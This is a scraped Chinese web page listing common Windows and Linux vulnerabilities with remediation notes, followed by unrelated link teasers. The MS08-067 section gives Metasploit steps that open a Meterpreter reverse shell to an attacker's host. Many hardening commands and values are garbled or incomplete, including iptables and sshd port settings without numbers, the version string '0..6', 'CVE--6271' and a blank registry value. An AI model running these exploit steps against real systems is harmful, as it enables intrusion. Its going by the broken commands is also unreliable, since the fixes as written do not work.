应用安全 - Windows操作系统 - 漏洞 - 汇总
MS15-011
Date
类型
远程代码执行 前置条件
SMB 影响范围
| 2012R2
FTP弱密码
将FTP服务器的密码更改为强密码
vi /etc/vsftpd/vsftpd.conf
anonymous_enable=NO #禁止匿名登录
重启ftp服务
Windows匿名用户整改参考:
https://www.jb51.net/article/135347.htm
SSH弱密码
修改ssh配置文件:
.修改iptables
首先要过防火墙,修改防火墙规则:
/sbin/iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport -j ACCEPT
保存规则:
service iptables save
重启防火墙:
service iptables restart .修改ssh配置文件
修改ssh端口:
vim /etc/ssh/sshd_config
在端口#Port 22下面增加Port
vim /etc/ssh/ssh_config
在端口#Port 22下面增加Port
重启ssh服务:
service sshd restart .其他修改
限制用户的SSH访问
假设我们只要xiaocao和homeway用户能通过SSH使用系统,向sshd_config配置文件中添加
vim /etc/ssh/sshd_config
修改下面一行:
AllowUsers xiaocao homeway
smb弱密码
修复:
Linux服务器:在smb的配置文件(如smb.conf)中的全局配置,如在配置日志文件大小(max log size = **)的下行添加两行security = user 和 valid users = 用户名(多个用户名之间用逗号","隔开,此处的用户应该是所有共享文件夹的所有用户),,若存在map to guest = bad user,将此语句注释掉,保存配置文件,重启smb服务。
windows服务器:禁止ipc$空连接进行枚举,运行regedit,找到如下组键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:
telnet弱密码
ms12-020
安装微软安全补丁KB2621440
Ms10-070 Padding Oracle
根据微软更新公告:https://technet.microsoft.com/library/security/ms10-070处理
shell shock破壳
根据Linux操作系统和bash版本版本寻找相应的CVE--6271补丁
mssql/mysql弱密码
配置强密码,或只允许特定IP访问
MS08_067
Date:
2008 类型:
缓冲区溢出导致远程代码执行 影响范围:
修复:
安装微软官网MS08-067补丁https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067 复现:
前置条件:未安装补丁/445端口开启
(1)msfconsole
(2)use exploit/windows/smb/ms08_067_netapi
(3)setrhost xx.xx.xx.xx
(4)set lhost xx.xx.xx.xx
(5)setpayload windows/meterpreter/reverse_tcp
(6)settarget34
(7)run
cve-2018-10933 libssh认证绕过
下载最新的0..6以及0..4版本的libssh并安装
http.sys远程命令执行
微软补丁下载地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
dns区域传送
严格限制允许区域传送的主机
应用安全 - Windows操作系统 - 漏洞 - 汇总的更多相关文章
- CVE-2019-0797漏洞:Windows操作系统中的新零日在攻击中被利用
		
https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/ 前言 在2019年2月,卡巴实验室的自动漏洞防护(AEP)系统检测 ...
 - Hacker(18)----了解Windows系统漏洞
		
一.WinXP中的漏洞 在WinXP中,常见的漏洞主要有UPNP服务漏洞.帮助与支持中心漏洞.压缩文件夹漏洞.服务拒绝漏洞.RDP漏洞以及热键漏洞. 1.UPNP服务漏洞 漏洞描述:UPNP(Univ ...
 - Hacker(17)----认识Windows系统漏洞
		
Windows系统是迄今为止使用频率最高的操作系统,虽然其安全性随着版本的更新不断提高,但由于人为编写的缘故始终存在漏洞和缺陷.但Mircosoft公司通过发布漏洞补丁来提高系统的安全性,使Windo ...
 - 使用老毛桃安装Windows操作系统
		
首先必须知道什么是PE系统? 当电脑出现问题而不能正常进入系统时候的一种“紧急备用”系统,通常放在U盘中,设置启动项优先级,使得电脑启动的时候加载PE系统. 如何在U盘中安装老毛桃(PE工具箱)? h ...
 - Windows 操作系统如何使程序开机自启
		
Windows 操作系统如何开机自启 一.前言: 作为一只运维开发,很多时候需要将自己的小工具做开机自启.在 Linux 的世界里,如果你希望一个程序可以开机自启,那么可以在/etc/rc.d/rc. ...
 - Windows操作系统及其安全机制
		
kali视频学习请看 http://www.cnblogs.com/lidong20179210/p/8909569.html Windows操作系统及其安全机制 Windows文件系统 FAT (F ...
 - 反射实现Model修改前后的内容对比    【API调用】腾讯云短信    Windows操作系统下Redis服务安装图文详解    Redis入门学习
		
反射实现Model修改前后的内容对比 在开发过程中,我们会遇到这样一个问题,编辑了一个对象之后,我们想要把这个对象修改了哪些内容保存下来,以便将来查看和追责. 首先我们要创建一个User类 1 p ...
 - 玩转Windows服务系列汇总
		
玩转Windows服务系列汇总 创建Windows服务 Debug.Release版本的注册和卸载及其原理 无COM接口Windows服务启动失败原因及解决方案 服务运行.停止流程浅析 Windows ...
 - Windows操作系统下远程连接MySQL数据库
		
用Eclipse做一个后台项目,但是数据库不想放在本地电脑,于是买了一个腾讯云服务器(学生有优惠,挺便宜的),装上MySQL数据库,但是测试连接的时候,发现总是连接不是上,但是本地数据库可以连接,于是 ...
 
随机推荐
- python 更快地判断数字的奇数还是偶数
			
使用 按位与运算符(&) 将能更加快速地判断一个整数是奇数还是偶数 使用举例如下: def check_number(n): if n & 1: return '奇数' else: r ...
 - Neo4j的查询语法笔记(二)
			
cypher是neo4j官网提供的声明式查询语言,非常强大,用它可以完成任意的图谱里面的查询过滤,我们知识图谱的一期项目 基本开发完毕,后面会陆续总结学习一下neo4j相关的知识.今天接着上篇文章来看 ...
 - Linux终端复用工具tmux的使用和配置
			
1. 会话管理 新建会话 $ tmux new -s session-one -d -s:指定回话名称 -d:会话在后台运行 查看所有会话 $ tmux ls session-one: 1 windo ...
 - 只要三步,你就可以在github上发布网站了
			
今天,看到github推送了一个新的消息,Publishing with GitHub Pages, now as easy as 1, 2, 3.总结起来就是在github将你的文档或者发布网页将会 ...
 - Vue 实现一个分页组件
			
实现分页组件要分三个部分 样式,逻辑,和引用 首先新建一个vue文件用来承载组件内容 第一步:构建样式 <template> <nav> <ul class=" ...
 - AGC036C GP 2
			
由于近期集训做的一直都是校内题 然后好久都怎么写题了( 发篇博客证明我还活着 (其实也没人关心 好像并不是很难的一道计数 就是脑子总是缺一块导致会做不出来( 首先我们可以分析性质 1.$\sum A_ ...
 - Spring---异步消息
			
1.异步消息 1.1.目的: 为了 系统与系统 之间的通信: 1.2.概念: 异步消息 :消息的 发送者 无需 等待消息 接收者的处理及返回,甚至 无需 关心消息是否发送成功: 1. ...
 - 给mongodb设置密码
			
内容来自:https://segmentfault.com/a/1190000011554055 mongodb安装后是无需密码 Mongodb安装后自身是没有密码的,用户连接只需填写id地址,端口号 ...
 - leetcode-167周赛-1292-元素和小于等于阈值的正方形的最大边长
			
题目描述; 自己的提交:超时 class Solution: def maxSideLength(self, mat: List[List[int]], threshold: int) -> i ...
 - Jira插件安装
			
以下操作需要反编译 1.反编译的jar包 1)E:\JIRA安装路径\atlassian-jira\WEB-INF\atlassian-bundled-plugins\atlassian-univer ...
 
			
		